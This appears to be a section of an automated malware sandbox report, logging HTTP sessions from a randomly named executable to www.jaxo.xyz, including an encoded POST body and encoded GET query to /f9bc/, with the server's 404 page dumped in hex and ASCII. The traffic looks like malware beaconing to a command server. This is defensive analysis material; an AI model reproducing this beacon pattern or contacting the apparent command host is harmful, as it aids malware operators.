                  Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                  Sep 4, 2024 09:36:59.591576099 CEST | 1236 | IN | Data Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                  Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                  Sep 4, 2024 09:36:59.591593027 CEST | 672 | IN | Data Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                  Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                  Sep 4, 2024 09:36:59.591605902 CEST | 1236 | IN | Data Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                  Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                  Sep 4, 2024 09:36:59.591617107 CEST | 1236 | IN | Data Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                  Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                  Sep 4, 2024 09:36:59.591634989 CEST | 448 | IN | Data Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                  Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                  Sep 4, 2024 09:36:59.591672897 CEST | 1236 | IN | Data Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                  Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                  Sep 4, 2024 09:36:59.596539021 CEST | 1236 | IN | Data Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                  Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  19 | 192.168.2.4 | 49756 | 66.29.149.180 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:01.406809092 CEST | 10835 | OUT | POST /f9bc/ HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jaxo.xyz
                  Referer: http://www.jaxo.xyz/f9bc/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 41 74 2b 6c 72 43 6f 68 65 41 70 79 65 55 54 41 77 67 77 76 55 34 63 54 52 55 4e 6b 72 73 65 6e 67 6c 33 59 30 56 30 4a 46 35 61 4a 2b 66 33 77 39 35 64 70 50 2b 47 64 2f 54 54 36 74 72 51 30 65 50 50 46 47 38 55 38 79 4c 6d 44 6f 32 44 46 37 32 52 4b 2f 45 48 46 44 78 41 37 51 4b 6d 74 34 59 35 75 59 38 39 43 71 5a 5a 63 7a 4d 42 59 57 33 53 53 51 73 68 56 39 49 62 6e 33 59 56 58 39 66 71 76 78 2b 51 45 33 52 52 68 2b 63 78 6e 79 71 31 67 70 61 6d 6a 57 64 6d 66 6f 77 52 38 53 61 55 74 49 76 2b 72 56 47 6d 36 65 53 7a 45 54 65 2f 42 79 59 58 4a 7a 57 77 79 68 56 67 2b 55 63 42 4a 35 75 69 35 38 64 78 6e 70 53 66 63 63 68 41 4c 6c 51 42 43 47 6d 46 43 6f 53 48 46 44 47 6d 52 73 79 49 78 6b 46 79 59 4a 49 45 73 79 34 31 47 7a 54 69 56 50 4a 39 70 70 52 63 68 55 31 72 49 37 67 75 69 66 4a 34 45 41 6b 4e 36 46 76 53 42 39 76 37 49 4d 38 34 72 71 2b 73 39 52 64 62 [TRUNCATED]
                  Data Ascii: 56gD=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QE3RRh+cxnyq1gpamjWdmfowR8SaUtIv+rVGm6eSzETe/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcchALlQBCGmFCoSHFDGmRsyIxkFyYJIEsy41GzTiVPJ9ppRchU1rI7guifJ4EAkN6FvSB9v7IM84rq+s9Rdb [TRUNCATED]
                  Sep 4, 2024 09:37:02.032790899 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:37:01 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:37:02.032810926 CEST | 1236 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                  Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                  Sep 4, 2024 09:37:02.032818079 CEST | 1236 | IN | Data Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                  Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                  Sep 4, 2024 09:37:02.032823086 CEST | 1236 | IN | Data Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                  Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                  Sep 4, 2024 09:37:02.032830954 CEST | 896 | IN | Data Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                  Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                  Sep 4, 2024 09:37:02.032933950 CEST | 1236 | IN | Data Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                  Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                  Sep 4, 2024 09:37:02.032944918 CEST | 1236 | IN | Data Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                  Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                  Sep 4, 2024 09:37:02.032957077 CEST | 448 | IN | Data Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                  Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                  Sep 4, 2024 09:37:02.033037901 CEST | 1236 | IN | Data Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                  Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                  Sep 4, 2024 09:37:02.033061981 CEST | 1236 | IN | Data Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                  Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.
                  Sep 4, 2024 09:37:02.039450884 CEST | 1236 | IN | Data Raw: 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d 2e 31 38 36 2d 2e 31 33 37 2d 2e 33 32 39 2d
                  Data Ascii: 4-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translate(161 68)"/>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  20 | 192.168.2.4 | 49757 | 66.29.149.180 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:04.015805006 CEST | 477 | OUT | GET /f9bc/?56gD=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:04.569159031 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:37:04 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:37:04.569180012 CEST | 224 | IN | Data Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                  Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify
                  Sep 4, 2024 09:37:04.569190025 CEST | 1236 | IN | Data Raw: 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20
                  Data Ascii: -content: center;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent;
                  Sep 4, 2024 09:37:04.569200993 CEST | 1236 | IN | Data Raw: 32 32 2e 35 33 38 2d 32 32 2e 31 38 38 2d 32 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30
                  Data Ascii: 22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55
                  Sep 4, 2024 09:37:04.569217920 CEST | 1236 | IN | Data Raw: 6c 6c 3d 22 23 45 36 41 39 35 46 22 20 64 3d 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38
                  Data Ascii: ll="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3
                  Sep 4, 2024 09:37:04.569228888 CEST | 1236 | IN | Data Raw: 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63
                  Data Ascii: form="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.44
                  Sep 4, 2024 09:37:04.569240093 CEST | 1236 | IN | Data Raw: 20 32 2e 33 38 31 2d 2e 30 30 35 2e 34 37 2e 33 33 33 2e 37 34 39 2e 34 37 2e 33 35 2e 32 30 36 2d 2e 35 39 32 2e 34 32 32 2d 31 2e 33 34 2e 35 31 37 2d 32 2e 30 34 37 2e 30 38 32 2d 2e 35 39 38 2d 2e 32 35 33 2d 2e 39 32 31 2d 2e 34 37 34 2d 2e
                  Data Ascii: 2.381-.005.47.333.749.47.35.206-.592.422-1.34.517-2.047.082-.598-.253-.921-.474-.684M38.964 14.6c-.26-.324-1.293-.581-2.192-.6-.626-.012-.971.28-.65.452.459.244 1.155.57 2.063.547.56-.014.936-.205.78-.4M51.58 3.028c-.54-.1-.912.074-1.399.401-
                  Sep 4, 2024 09:37:04.569283009 CEST | 1120 | IN | Data Raw: 30 32 34 63 2d 2e 34 32 33 2e 32 31 32 2d 2e 35 38 20 31 2e 33 35 32 2d 2e 35 32 33 20 32 2e 31 37 34 2e 30 36 36 2e 39 34 36 2e 36 36 34 20 31 2e 31 33 2e 37 38 35 2e 31 34 34 2e 30 36 35 2d 2e 35 33 38 2e 32 32 2d 31 2e 30 34 31 2e 32 30 33 2d
                  Data Ascii: 024c-.423.212-.58 1.352-.523 2.174.066.946.664 1.13.785.144.065-.538.22-1.041.203-1.612-.016-.528-.238-.82-.465-.706M15.946 21.201c-.04-.142-.134-.197-.214-.2-.311-.02-.464.621-.576 1.05-.124.468-.188.945-.14 1.461.053.562.486.699.57.088.053-.
                  Sep 4, 2024 09:37:04.569293976 CEST | 1236 | IN | Data Raw: 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e
                  Data Ascii: .366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.
                  Sep 4, 2024 09:37:04.569305897 CEST | 1236 | IN | Data Raw: 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34
